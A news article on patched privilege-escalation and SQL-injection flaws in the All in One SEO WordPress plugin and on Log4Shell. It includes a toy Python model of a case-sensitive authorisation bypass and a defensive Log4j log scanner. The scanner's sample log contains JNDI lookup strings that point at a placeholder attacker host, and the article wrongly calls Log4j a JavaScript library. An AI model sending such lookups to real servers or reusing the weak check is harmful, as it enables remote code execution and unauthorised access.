Nearly A Million WordPress Websites Vulnerable To Takeover Attacks

Over 800,000 websites remain vulnerable to a pair of critical security flaws in a popular WordPress SEO plugin, a reminder of the importance of applying updates and patches promptly, and of working with white label development teams to resolve any issues.

The All In One SEO plugin, which is used on over 3m websites, was patched several weeks ago, but an estimated 820,000 webmasters have yet to deploy the update; until they do, their sites are exposed to takeover attacks made possible by two major security oversights.

Until a site is updated to version 4.1.5.3, these two vulnerabilities can cause major damage from an account with exceptionally limited access, and security experts have implored webmasters to check that they are safe.

How The Exploits And Takeover Attack Work

The All in One SEO plugin, before its most recent update, was vulnerable to two major security flaws:

CVE-2021-25036, a critical-level flaw allowing authenticated privilege escalation, which lets Subscriber and other low-level accounts gain Webmaster-level privileges.

CVE-2021-25037, a severe authenticated SQL injection flaw that allows arbitrary code to be executed on the server.

Each is harmful on its own, but chained together they can be used to plant malicious code on the server that executes when visitors load the website, and the privilege checks are trivially circumvented by changing a single character of a request to an uppercase letter.

The same access could also be used to create .htaccess backdoors that facilitate further cyberattacks in the future.
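The single-uppercase-character bypass described above is an instance of a general bug class: a router that matches paths case-insensitively paired with an authorisation check that looks the path up case-sensitively, so a differently cased path reaches the handler without reaching the permission rule. The following Python is a constructed toy model added for this page to show the weak check beside a hardened one; it is not code from the All in One SEO plugin, and the route names, roles and capability table are invented placeholders.

```python
"""Toy model of the bug class described above: a REST-style router that matches
paths case-insensitively while the permission check looks the path up
case-sensitively. Constructed for this page; not code from the All in One SEO
plugin, whose real routes and checks are not shown here."""
from typing import Callable, Dict, Optional, Set

# Constructed permission table: canonical (lower-case) route -> capability required.
ROUTE_CAPABILITIES: Dict[str, str] = {
    "/seo/v1/settings": "manage_options",  # administrators only
    "/seo/v1/status": "read",              # any logged-in user
}

# Constructed role model, in the spirit of WordPress capabilities.
ROLE_CAPABILITIES: Dict[str, Set[str]] = {
    "administrator": {"read", "manage_options"},
    "subscriber": {"read"},
}


def canonical(path: str) -> str:
    """Normalise a path the way the router does: case-fold, drop trailing slash."""
    return path.lower().rstrip("/") or "/"


def user_can(role: str, capability: str) -> bool:
    return capability in ROLE_CAPABILITIES.get(role, set())


def weak_authorize(path: str, role: str) -> bool:
    """Vulnerable pattern: the table is consulted with the path exactly as sent,
    and an unknown path falls back to the lax 'read' capability (fail-open).
    '/seo/v1/Settings' is not a key, so a subscriber receives the default."""
    required = ROUTE_CAPABILITIES.get(path, "read")
    return user_can(role, required)


def hardened_authorize(path: str, role: str) -> bool:
    """Fixed pattern: normalise before the lookup, exactly as the router does,
    and fail closed when the path is not in the table."""
    required: Optional[str] = ROUTE_CAPABILITIES.get(canonical(path))
    if required is None:
        return False
    return user_can(role, required)


def dispatch(path: str, role: str, authorize: Callable[[str, str], bool]) -> str:
    """Case-insensitive router: returns '404', '403' or the handled canonical route."""
    route = canonical(path)
    if route not in ROUTE_CAPABILITIES:
        return "404"
    if not authorize(path, role):
        return "403"
    return f"handled {route}"


if __name__ == "__main__":
    for auth in (weak_authorize, hardened_authorize):
        print(auth.__name__, dispatch("/seo/v1/Settings", "subscriber", auth))
```

The fix has two parts, and both matter: the authorisation layer must canonicalise input with the same function the router uses, and an unmatched rule must deny rather than fall through to a permissive default.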

However, it must be noted that AIO SEO responded quickly to the report and pushed a patch that closes both holes on websites that deploy it.

Other Major Vulnerabilities

Another recent major vulnerability, now patched and with a potentially wider reach, affected the widely used javascript logging library Log4j.

The initial problem was a vulnerability known as Log4Shell; an incomplete fix for it led to a second exploit that also allowed remote code execution, potentially letting servers be taken over and used to stage distributed denial-of-service (DDoS) attacks.

This is a major issue, as a range of services including Cloudflare, Red Hat Linux, Twitter, Amazon Web Services and even Tesla’s software packages were affected, as well as video games such as Minecraft, where a simple message in the chatbox allowed for remote code execution.
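The chatbox case above illustrates the mechanism: any user-supplied string that reaches a vulnerable Log4j logger is scanned for `${...}` lookups, and a JNDI lookup causes the server to fetch and run remote code. A first line of defence while patching is to find such lookups in existing logs. The following Python is an added detection example written for this page, not code from Log4j or any vendor; the log lines it scans are constructed, and `attacker.example` is a placeholder host.

```python
"""Scan log lines for Log4j JNDI lookups of the form "${jndi:<scheme>:...}".
Added example for this page; the sample log below is constructed and the host
names in it are placeholders, not real indicators."""
import re
from typing import Dict, List

# The lookup parser is case-insensitive and tolerates whitespace, so the
# detector must be too; the capture group records the URI scheme (ldap, rmi, dns, ...).
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def find_jndi_lookups(line: str) -> List[str]:
    """Return the lower-cased URI scheme of every JNDI lookup found in one line."""
    return [m.group(1).lower() for m in JNDI_LOOKUP.finditer(line)]


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per line that carries at least one JNDI lookup.
    Ordinary "${...}" placeholders (no jndi prefix) are not reported."""
    findings: List[Dict[str, object]] = []
    for number, line in enumerate(lines, 1):
        schemes = find_jndi_lookups(line)
        if schemes:
            findings.append({"line": number, "schemes": schemes, "text": line})
    return findings


# Constructed sample in the style of a game-server chat log.
SAMPLE_LOG = [
    "[12:01:03] [Server thread/INFO]: <alice> anyone up for a build?",
    "[12:01:09] [Server thread/INFO]: <mallory> ${jndi:ldap://attacker.example:1389/a}",
    "[12:01:15] [Server thread/INFO]: <bob> my balance is ${amount} coins",
    "[12:02:00] [User Authentication/INFO]: player carol joined the game",
    "[12:02:41] [Server thread/INFO]: <mallory> ${ JNDI : RMI://attacker.example/x }",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit['line']}: jndi via {','.join(hit['schemes'])}: {hit['text']}")
```

Note what the detector does and does not claim: a match means a lookup string was logged, not that resolution succeeded; confirming impact still requires checking the Log4j version in use and outbound connections from the host around the timestamp.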

This ended up causing controversy in China, as the vulnerability was initially reported to Log4j’s developer, the Apache Software Foundation, without alerting the Chinese Ministry of Industry and Information Technology, which led to a six-month suspension of a partnership between the ministry and Alibaba Cloud.

This has also led to a request by the Chinese government that state-owned companies migrate services and data previously stored on Alibaba Cloud and Tencent servers to a state-controlled cloud system.

Due to the relative ease of the exploit and the high damage it can cause, Log4j has been repeatedly patched, and the situation continued to be monitored after the initial exploit was posted in early December 2021.